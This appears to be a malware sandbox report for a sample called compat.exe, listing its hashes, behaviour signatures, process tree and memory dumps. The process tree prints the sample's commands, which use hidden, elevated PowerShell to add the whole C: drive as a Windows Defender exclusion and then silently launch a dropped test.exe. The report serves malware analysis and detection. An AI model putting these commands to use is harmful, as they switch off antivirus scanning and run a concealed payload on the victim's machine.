c1b148bc680a5632b635daf0a25997d9b3addba6e745370ba19298ff365859c1

General

Target

compat.exe
Size

2.3MB
MD5

762cb6a485d80bb9bfe03b41dea15d0c
SHA1

82bfac0067037ff3bd4e01cc1f3a9b38eea0762f
SHA256

c8be9798b47ba613eac093efd3d045c99aad97bd255172ac2e59687db71ad25f
SHA512

b08180f85f0945572e2ce426caa7c7848bc79c8b80424d207bec9b340826d0f9b5622472f53faba53126d4e4d2198586c135393c574064588d9a38169e500cac
SSDEEP

49152:DiubKxC3aujrb/ThvO90d7HjmAFd4A64nsfJ5y4gXG/jpCF11z1:13LwA

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
976	powershell.exe
976	powershell.exe
976	powershell.exe
432	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 976	1064	compat.exe	27
PID 1064 wrote to memory of 976	1064	compat.exe	27
PID 1064 wrote to memory of 976	1064	compat.exe	27
PID 976 wrote to memory of 1492	976	powershell.exe	29
PID 976 wrote to memory of 1492	976	powershell.exe	29
PID 976 wrote to memory of 1492	976	powershell.exe	29
PID 1492 wrote to memory of 432	1492	cmd.exe	31
PID 1492 wrote to memory of 432	1492	cmd.exe	31
PID 1492 wrote to memory of 432	1492	cmd.exe	31
PID 1492 wrote to memory of 300	1492	cmd.exe	32
PID 1492 wrote to memory of 300	1492	cmd.exe	32
PID 1492 wrote to memory of 300	1492	cmd.exe	32
PID 1064 wrote to memory of 1580	1064	compat.exe	33
PID 1064 wrote to memory of 1580	1064	compat.exe	33
PID 1064 wrote to memory of 1580	1064	compat.exe	33
PID 1580 wrote to memory of 1100	1580	powershell.exe	35
PID 1580 wrote to memory of 1100	1580	powershell.exe	35
PID 1580 wrote to memory of 1100	1580	powershell.exe	35

C:\Users\Admin\AppData\Local\Temp\compat.exe
"C:\Users\Admin\AppData\Local\Temp\compat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \\\"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" \/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath 'C:\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:432
  - - C:\Windows\system32\fsutil.exe
      fsutil file createnew C:\Users\Admin\AppData\Roaming\\excluded.txt 1
      4⤵
      PID:300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \\\"/k start %AppData%\\test.exe\" -WindowStyle hidden"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" \/k start %AppData%\\test.exe
    3⤵
    PID:1100

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9debf3826821ee4a2fe69789c79e5e66

SHA1
ae68cd5410ff7bb5f4b0af4a4dea6fb45555b1ff

SHA256
b4c09c80955a9e8187d426a1d2a4638f292390952a219e08935e6c543ce58e7a

SHA512
a644e40baa419ecfaff6cb3ada7f3da3d937d8a7befbe49340c2b6e760de55b97ddda85c7dfaf7825c30d5c69441a9c619b49c6767f407159da33be646ecb42e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9debf3826821ee4a2fe69789c79e5e66

SHA1
ae68cd5410ff7bb5f4b0af4a4dea6fb45555b1ff

SHA256
b4c09c80955a9e8187d426a1d2a4638f292390952a219e08935e6c543ce58e7a

SHA512
a644e40baa419ecfaff6cb3ada7f3da3d937d8a7befbe49340c2b6e760de55b97ddda85c7dfaf7825c30d5c69441a9c619b49c6767f407159da33be646ecb42e

Download Submit
memory/432-70-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/432-69-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/432-71-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download
memory/432-68-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/432-67-0x000007FEF2E60000-0x000007FEF39BD000-memory.dmp

Filesize
11.4MB

Download
memory/432-66-0x000007FEF39C0000-0x000007FEF43E3000-memory.dmp

Filesize
10.1MB

Download
memory/976-59-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/976-61-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/976-62-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/976-58-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/976-57-0x000007FEF3800000-0x000007FEF435D000-memory.dmp

Filesize
11.4MB

Download
memory/976-56-0x000007FEF4360000-0x000007FEF4D83000-memory.dmp

Filesize
10.1MB

Download
memory/976-55-0x000007FEFBDB1000-0x000007FEFBDB3000-memory.dmp

Filesize
8KB

Download
memory/1580-77-0x000007FEF4360000-0x000007FEF4D83000-memory.dmp

Filesize
10.1MB

Download
memory/1580-78-0x000007FEF3800000-0x000007FEF435D000-memory.dmp

Filesize
11.4MB

Download
memory/1580-81-0x000000000274B000-0x000000000276A000-memory.dmp

Filesize
124KB

Download
memory/1580-80-0x0000000002744000-0x0000000002747000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads